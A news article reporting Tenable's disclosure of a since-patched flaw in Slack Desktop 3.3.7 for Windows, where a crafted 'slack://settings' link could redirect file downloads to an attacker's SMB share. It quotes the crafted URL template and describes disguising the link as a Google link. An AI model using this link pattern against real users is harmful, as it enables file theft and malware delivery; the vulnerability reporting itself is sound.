Enlarge / Strangers in your Slack channel could have messed with Slack for Windows’ download settings, redirecting files to a malicious shared folder. It’s fixed now. (credit: NOAH BERGER/AFP/Getty Images)

On May 17, researchers at Tenable revealed that they had discovered a vulnerability in the Windows version of the desktop application for Slack, the widely-used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would allow the attacker not only to steal the files that were downloaded by a targeted user going forward, but it would potentially allow them to alter the files and add malware to them—that way when the victim opened the files, they would get a potentially nasty surprise.

Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.

The potential attack used a weakness in the way the “slack://” protocol handler was implemented in the Windows application. By creating a crafted link posted in a Slack channel, the attacker could alter the default settings of the client—changing the download directory, for example, to a new location with a URL such as “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}”. That path could be directed to a Server Message Block (SMB) file sharing location controlled by the attacker. Once clicked, all future downloads would be dropped onto the attacker’s SMB server. This link could be disguised as a Web link—in a proof-of-concept, the malicious Slack attack posed as a link to Google.